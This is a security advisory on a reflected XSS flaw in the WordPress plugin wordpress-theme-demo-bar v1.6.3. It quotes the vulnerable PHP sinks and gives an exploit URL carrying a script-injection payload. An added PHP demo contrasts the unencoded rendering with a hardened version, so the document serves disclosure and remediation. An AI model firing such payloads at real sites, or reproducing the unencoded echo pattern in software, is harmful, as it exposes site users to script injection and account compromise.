Advisory #: 88
Title: Reflected XSS in wordpress plugin wordpress-theme-demo-bar v1.6.3
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/wordpress-theme-demo-bar
Downloads: 33467
Vendor Notified: 2016-02-09
Vendor Contact: plugins@wordpress.org
Plugin Name: wordpress-theme-demo-bar
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code in ./wordpress-theme-demo-bar/edit-theme-options.php:

  43:<a class="wptdb_qtip" title="Refresh this page back to <?php echo $editingtheme['Name']; ?> theme options." href="<?php echo $zv_wptdb_siteurl; ?>/wp-content/plugins/wordpress-theme-demo-bar/edit-theme-options.php?theme=<?php echo $_GET['theme']; ?>">Refresh</a>

  45:<a target="_blank" class="wptdb_qtip" title="Preview this theme in a new window after you save the theme options." href="<?php echo $zv_wptdb_siteurl; ?>/?themedemo=<?php echo $_GET['theme']; ?>">Preview</a>

  56:document.getElementById('iframe_container').innerHTML = '<iframe id="option-iframe" width="600" height="400" src="<?php echo $zv_wptdb_siteurl; ?>/wp-admin/themes.php?page=functions.php&themedemo=<?php echo $_GET['theme']; ?>&editfunctionsphp=1" style="margin:0px;padding:0px;border:5px solid #cccccc"></iframe>';

The theme parameter ($_GET['theme']) is echoed back to the user's browser without sanitization or encoding, in two href attributes (lines 43 and 45) and inside a JavaScript string literal within a <script> block (line 56). Each of these is a separate output context, and the value is not encoded for any of them.
CVE-ID: Not Released
File:./wordpress-theme-demo-bar/edit-theme-options.php
Exploit Code:
The exploit was derived from the first appearance of the vulnerable parameter in the code; there could be more, as shown above.
  This is an untested autogenerated exploit:
  http://[target]/wp-content/plugins/wordpress-theme-demo-bar/edit-theme-options.php?theme="><script>alert(1);</script><"
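The following script is an added example and is not code from the advisory or from the plugin. It models the three sinks quoted above (lines 43, 45 and 56, with the title, class and style attributes dropped for brevity) and renders them once as the plugin does and once hardened, so the effect of the advisory's payload can be compared directly. The site URL, the list of installed theme slugs and the script name are assumptions; plain PHP functions are used so it runs from the CLI without WordPress, and the comments name the WordPress helpers a real fix would use in their place.

```php
<?php
// Added example, not code from the advisory or the plugin. Models the three
// output sinks in edit-theme-options.php and shows the vulnerable rendering
// beside a hardened one. Plain PHP is used so it runs without WordPress.

// Constructed stand-ins for the plugin's runtime values (assumptions).
$siteurl     = 'https://example.test';               // plays the role of $zv_wptdb_siteurl
$knownThemes = ['twentysixteen', 'twentyfifteen'];   // plays the role of the installed theme slugs

// As the plugin does it: the theme value goes straight into two href
// attributes and into a JavaScript string literal inside a <script> block.
function render_vulnerable(string $siteurl, string $theme): string
{
    $out  = '<a href="' . $siteurl . '/wp-content/plugins/wordpress-theme-demo-bar/edit-theme-options.php?theme=' . $theme . '">Refresh</a>' . "\n";
    $out .= '<a href="' . $siteurl . '/?themedemo=' . $theme . '">Preview</a>' . "\n";
    $out .= "<script>document.getElementById('iframe_container').innerHTML = '<iframe src=\""
          . $siteurl . '/wp-admin/themes.php?page=functions.php&themedemo=' . $theme . '&editfunctionsphp=1'
          . "\"></iframe>';</script>\n";
    return $out;
}

// Hardened: validate against the installed theme slugs first, then encode for
// each output context separately. Both steps are kept: validation stops
// arbitrary input early, context encoding protects the sinks regardless.
function render_hardened(string $siteurl, string $theme, array $knownThemes): string
{
    if (!in_array($theme, $knownThemes, true)) {
        return "<p>Unknown theme.</p>\n";
    }

    // Query-string context: percent-encode the value
    // (WordPress: add_query_arg() on the URL, then esc_url()).
    $qs = rawurlencode($theme);

    // HTML attribute context: entity-encode the complete URL (WordPress: esc_url()).
    $refreshUrl = htmlspecialchars($siteurl . '/wp-content/plugins/wordpress-theme-demo-bar/edit-theme-options.php?theme=' . $qs, ENT_QUOTES, 'UTF-8');
    $previewUrl = htmlspecialchars($siteurl . '/?themedemo=' . $qs, ENT_QUOTES, 'UTF-8');

    // JavaScript string context: emit a JSON string literal with the
    // HTML-significant characters hex-escaped, so the value can neither end
    // the string nor close the <script> block
    // (WordPress: wp_json_encode(), or esc_js() inside a quoted literal).
    $iframeSrc = json_encode(
        $siteurl . '/wp-admin/themes.php?page=functions.php&themedemo=' . $qs . '&editfunctionsphp=1',
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );

    $out  = '<a href="' . $refreshUrl . '">Refresh</a>' . "\n";
    $out .= '<a href="' . $previewUrl . '">Preview</a>' . "\n";
    // Build the iframe with DOM methods rather than innerHTML: that removes
    // the nested HTML-inside-JavaScript parsing context entirely.
    $out .= "<script>var f = document.createElement('iframe'); f.src = " . $iframeSrc
          . "; document.getElementById('iframe_container').appendChild(f);</script>\n";
    return $out;
}

// Default input is the advisory's payload; any other value can be passed on the command line.
$theme = $argv[1] ?? '"><script>alert(1);</script><"';

echo "--- vulnerable rendering ---\n", render_vulnerable($siteurl, $theme);
echo "--- hardened rendering ---\n", render_hardened($siteurl, $theme, $knownThemes);
echo "--- hardened rendering, valid slug ---\n", render_hardened($siteurl, 'twentysixteen', $knownThemes);
```

Run it as `php render-demo.php` (the file name is arbitrary) to see the payload break out of the href attribute and the JS string in the first rendering, and `php render-demo.php twentysixteen` to see the hardened path emit encoded, still-working links. Note that the advisory's exploit URL requests the plugin file directly under /wp-content/plugins/, so whatever encoding is chosen, a fix should also refuse direct loads (the usual `defined('ABSPATH') || exit;` guard at the top of the file) so the sinks are only reachable through the WordPress admin and its capability checks.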